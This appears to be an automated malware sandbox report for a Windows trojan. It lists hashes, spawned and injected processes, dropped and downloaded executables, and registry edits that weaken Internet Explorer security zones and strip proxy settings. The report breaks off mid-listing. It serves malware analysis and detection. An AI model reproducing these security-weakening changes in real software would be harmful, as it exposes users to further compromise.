Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: f43a604241f2bb41d3ee1064890c23e1
SHA1: 056ba21a40e6beade3dc58fcd235e8a586f3adf6
SHA256: 544feaa02ef78f2468cea21c55a2573ca37249aad27b2fcc612fbd13b886491c
SSDeep: 3072:jQIURTXJeMMeGha2ppB6K58lAR0HhOv8W0Fb83:js9MtR8uyQv0B83
Size: 103077 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:46
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
nsh1D.tmp:260
nsh1D.tmp:1264
Bind.exe:776
amisid.exe:828
ppt.exe:1788
%original file name%.exe:1332
nsr1A.tmp:2012
nst16.tmp:264
nsw7.tmp:1224
nsn24.tmp:1984
setup3.exe:408
nsoB.tmp:284
setup3.tmp:1040
The Trojan injects its code into the following process(es):
avg18.exe:1888
adv_128.exe:1276
Mutexes
The following mutexes were created/opened:
ZonesLockedCacheCounterMutexZonesCounterMutexZonesCacheCounterMutexRasPbFileWininetProxyRegistryMutexWininetConnectionMutexWininetStartupMutexc:!documents and settings!adm!local settings!history!history.ie5!c:!documents and settings!adm!cookies!c:!documents and settings!adm!local settings!temporary internet files!content.ie5!_!MSFTHISTORY!_ShimCacheMutex
File activity
The process nsh1D.tmp:260 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\inetc.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\amisid.exe (909 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\amisid.exe (0 bytes)
The process nsh1D.tmp:1264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\amisid.exe (909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\checks.txt (544 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\amisid.exe (0 bytes)
The process avg18.exe:1888 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\adv_128.exe (1188757 bytes)
The process %original file name%.exe:1332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsn8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\pptxd[1].exe (47264 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\cmmdWriter[1].exe (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj27.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst16.tmp (36464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa28.tmp (150707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv29.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw7.tmp (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7121923af824073a25b2b7e6ba0a6e0e[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy25.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\prepreinstaller_win[1].exe (36464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn24.tmp (47264 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn23.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1A.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\L5lD0nHnr[1].exe (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\vos[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp (10646 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\wpesEcv[1].exe (150707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (60 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj27.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa28.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv29.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
The process nsr1A.tmp:2012 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1E.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1D.tmp (8472 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Bundle_OperaRUnew[1].exe (8472 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1E.tmp\inetc.dll (0 bytes)
The process nst16.tmp:264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\avg18.exe (40388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\SilentInstaller_dotnet4[1].exe (152993 bytes)
The process nsw7.tmp:1224 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi9.tmp (0 bytes)
The process nsn24.tmp:1984 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\setup3.exe (2420 bytes)
The process setup3.exe:408 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-IQVJP.tmp\setup3.tmp (7386 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-IQVJP.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-IQVJP.tmp\setup3.tmp (0 bytes)
The process nsoB.tmp:284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nskE.tmp (3638 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nskD.tmp (0 bytes)
The process setup3.tmp:1040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\baidu\is-GBLUE.tmp (36 bytes)
%Program Files%\baidu\unins000.dat (934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-1NTQ5.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\baidu\is-KO5N5.tmp (34453 bytes)
%Program Files%\baidu\is-I042G.tmp (601 bytes)
%Program Files%\baidu\baidu.ini (65 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-1NTQ5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-1NTQ5.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-1NTQ5.tmp\_isetup (0 bytes)
Registry activity
The process nsh1D.tmp:260 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst20.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst20.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst22.tmp\registry.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "S"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD 19 20 A1 CD 54 BE 8E 33 25 ED 48 50 3D 3B 0C"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\InternetTurbo]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsh1D.tmp:1264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 94 B2 1A EC 32 4B A1 02 33 A6 26 45 DB D1 E1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst20.tmp\registry.dll,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "M"
The process Bind.exe:776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D E0 96 39 2D 9D A7 C0 08 F8 D5 27 20 2D F5 48"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process avg18.exe:1888 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 A6 4A 1B FE 57 6D F7 DC D9 34 83 07 D6 1B 13"
The process amisid.exe:828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKCU\Software\InternetTurbo]
"UID" = "C8318CA6891F5119A9FD96EC19E98D71"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 DE D2 21 3A 2B 57 7B 10 08 5A 27 F1 22 3C 52"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level" = ""
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level"
The process ppt.exe:1788 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 14 A3 8B BD 41 65 E5 B7 17 46 17 D1 E3 F6 4E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
